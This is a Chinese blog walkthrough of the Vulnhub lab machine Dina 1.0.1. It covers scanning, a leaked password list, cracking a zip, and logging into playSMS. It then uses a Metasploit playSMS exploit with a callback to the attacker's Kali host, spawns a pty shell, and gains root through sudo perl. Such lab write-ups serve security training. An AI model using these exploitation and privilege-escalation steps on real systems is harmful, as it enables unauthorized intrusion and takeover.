Dina: 1.0.1靶场

最新推荐文章于 2024-09-29 16:26:13 发布
最新推荐文章于 2024-09-29 16:26:13 发布
阅读量406 收藏 7
点赞数 6
分类专栏: vulnhub靶场 Dina靶机 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64703089/article/details/142584410
版权

下载链接:https://download.vulnhub.com/dina/Dina-1-0-1.ova

一、信息收集

靶机界面

扫描主机ip

arp-scan -l

扫描端口

nmap -p- -A 192.168.137.129

扫描目录

dirb http://192.168.137.129/

打开网站

没有太多有用信息,点击提交后会有个目录

依旧没什么有用信息

进入http://192.168.137.129/robots.txt

逐一访问试试

除了/nothing 是这个页面外,其余都是空目录,那就先从这里入手

F12查看一波源代码发现泄露了类似与密码本的东西

#my secret pass
freedom
password
helloworld!
diana
iloveroot

继续查看其他目录 /secure 打开后有个zip文件下载下来放到kali里看看

发现里面是个mp3文件

尝试解压发现需要密码,拿刚刚泄露的密码试试,发现密码是freedom

发现文件好像损坏了,那应该是还有其他用处

那就先cat 一下试试

翻译过来大概是:我在电脑方面不是太聪明..…在服务器上我总是选择简单的密码.…带有密码备份文件。

里面附带了个 uname:touhid

还有个url : /SecreTSMSgatwayLogin

那就拼接一下尝试访问

进来后发现是个登陆界面,刚刚还给了用户名,密码先试试之前找到的密码本,尝试登陆

最终发现账户和密码为

username:touhid 
password:diana

二、Getshell

进来是这样的,左上角有个 playsms 的字眼,去msf搜搜有没有相关的漏洞

msfconsole
search playsms

发现有漏洞可以利用

use 0
set rhosts 192.168.137.129	 # 目标靶机IP
set password diana
set targeturi SecreTSMSgatwayLogin	# 目标靶机文件上传的路径,这个可以在url中看出
set username touhid
set lhost 192.168.137.130	    #kali的IP
show options                       # 检查一下有没有漏下的
run                           #运行

再转为交互式的shell

shell
python -c "import pty;pty.spawn('/bin/bash')"

这样就成功getshell

三、权限提升

先看看当前用户具有root权限的操作

sudo -l

发现了这样一个 /usr/bin/perl 那就去看看有没有可提权的payload

sudo perl -e 'exec "/bin/sh";'

安全beginner
关注
专栏目录
靶机渗透测试(Dina: 1.0.1)
@小张小张的博客
12-07 1679
靶机渗透测试(): **Vulnhub靶机 ** 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(====) 描述:It wated for kTheBox flag进度:2/2 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令:netdiscover -i eth0 -r 192.168.10.0 靶机ip为: 192.168.10.133 2. nmap进行靶机端口服务扫描 命令:
Dina1.0.1复现
weixin_61982677的博客
09-24 568
发现是一个 playSMS 框架的后台页面,使用 msfconsole查看是否有可利用的框架漏洞 exp。,密码还是使用之前的密码本爆破,得到结果为 diana,登录成功进入到一个 playSMS 后台界面。虚拟机默认网络模式为桥接,将网络模式修改为与 kali 一样的 NAT 模式。拼接 URL 地址访问,是一个 login 页面,用户名为。解压发现需要密码,尝试之前搜集到的密码本,发现密码为。发现 5 个不允许访问的页面有一个密码本。发现一个 zip 文件,下载下来。发现一个上传文件页面。
Dina: 1.0.1靶机
m0_61995767的博客
08-05 450
Dina: 1.0.1打靶记录
Vulnhub靶机:Dina: 1.0.1
whoami
09-24 876
Vulnhub靶机:Dina: 1.0.1实战
Vulhub靶场Dina-1.0.1
weixin_45650977的博客
04-30 949
Vulhub靶场Dina-1.0.1 靶机描述 环境准备 vmware15 打开 攻击机:kali NAT模式 靶机:Dina1.0.1 NAT模式
Dina: 1.0.1(靶机渗透测试)
2301_78721909的博客
07-29 799
Dina: 1.0.1 靶机渗透测试(from wuhu)
Dina: 1.0.1
2301_78815619的博客
09-29 594
尝试一番下来发现全都登不上,然后换了个浏览器等上去了,用户名就是刚刚得到的用户名,密码确实来自刚才那段源码。这段话提示了这个用户的密码是一个简单密码,我们暂时猜测可能与刚才源代码中得到的密码有关。将其用记事本打开,发现一段话、一个用户名、一个加密密码和一个url。经过尝试后,发现第二个可以利用,接下来尝试利用该漏洞来。,发现这里有一个压缩包,直接下载下来看看。设置完毕后再次查看一下选项,确认设置无误。拼接访问url,得到一个登录界面。解压需要密码,接下来寻找密码。解压成功,得到一个损坏的。
vulnhub-1:Dina
qq_60384876的博客
02-20 1002
Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚机到获取操作系统的root权限和查看flag。
vnlnhub系列:Dina: 1.0
jq_j37的博客
08-01 443
vnlnhub系列:Dina: 1.0靶机,打靶文章
M3dina:使用ASP.NET Core和IBM Blockchain Platform的电子引荐POC
05-11
**M3dina项目概述** M3dina是一个基于ASP.NET Core和IBM Blockchain Platform的电子推荐证明(Proof of Concept,POC)应用。这个项目利用了现代Web技术,如HTML5和JavaScript,以及后端的C#编程语言,旨在创建一个...
DINA Model and Parameter Estimation:A Didactic.pdf
05-30
根据提供的文件内容,我们可以了解到关于DINA模型和参数估计的相关知识点,以下是详细解析: 1. DINA模型(Deterministic Input, Noisy "and" gate model,确定性输入、噪声“与”门模型)是一个认知诊断模型...
DINA靶场渗透测试(保姆级超详细!!)
m0_57867209的博客
03-05 266
关于DINA靶场渗透测试的保姆级详细教程
2009年DINA模型详解:参数估计教程
DINA模型及其参数估计是心理学与教育测量领域的一项关键理论,由作者Jimmy de la Torre在2009年的一篇名为《DINAModel and Parameter Estimation: A Didactic》的文章中详细介绍。该模型属于认知诊断理论(Cognitive...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8508
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
rhino grasshoper 框内物体排列(附视频).gh
最新发布
10-18
【闭合线内物体按方向移动/排列】https://www.bilibili.com/video/BV1z1WfeSEWu?vd_source=b420114c993138474d2e93d83ead77a5
kwant-1.4.3-cp38-cp38-win_amd64.whl
10-18
kwant-1.4.3-cp38-cp38-win_amd64.whl
rhino grasshoper 景观椅(附视频).gh
10-18
【rhino@grasshoper 曲线金属座椅景观案例(文件获取/见简介)】https://www.bilibili.com/video/BV1Dx4y147Lr?vd_source=b420114c993138474d2e93d83ead77a5
PCIe通义万问系列文档的第一部已整理完毕,含999个PCIe相关问答
10-18
《PCIe通义万问》系列文档旨在记录PCIe相关行业工程师们在PCIe协议学习、IP设计验证、产品测试及使用过程中遇到的问题、迸发的思考、进行的探讨及可能的解决方案,以期给遇到相同相似问题的同行们些许启发。文档涉及的技术方向主要为PCIe,也包含PCIe相关的CXL、UCIe及计算机体系结构相关内容。 本文档是《PCIe通义万问》系列文档之(一),含999个问题。问题内容有以下三个来源:MangoPapa(下称博主)的“PCIe每日一问一答”系列专栏;博主的博文留言及私信讨论;博主作为群主的“PCIe技术交流群”群聊内容。MangoPapa小助理、折叠、先杰、CR小队长、kangling共同完成了问答内容提取与归纳整理,噫嘘唏及慕荷负责文辞优化及编辑排版,上述人员及MangoPapa、JasonW、皮塞阿姨、席可儿参与了文档内容的审校。感谢以上人员的无私奉献。 本文档仅对讨论内容进行总结记录,不保证问题答案的正确性,部分问题只提供解决思路或讨论过程。术业有专攻,文内定有偏颇。如您发现谬误,一敬希原宥,二望乞点拨;如您持异见,欢迎来信讨论。如有需要,欢迎联系MangoPapa加入相关
毕业设计论文SpringBoot招投标管理系统.docx
10-18
毕业设计论文
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值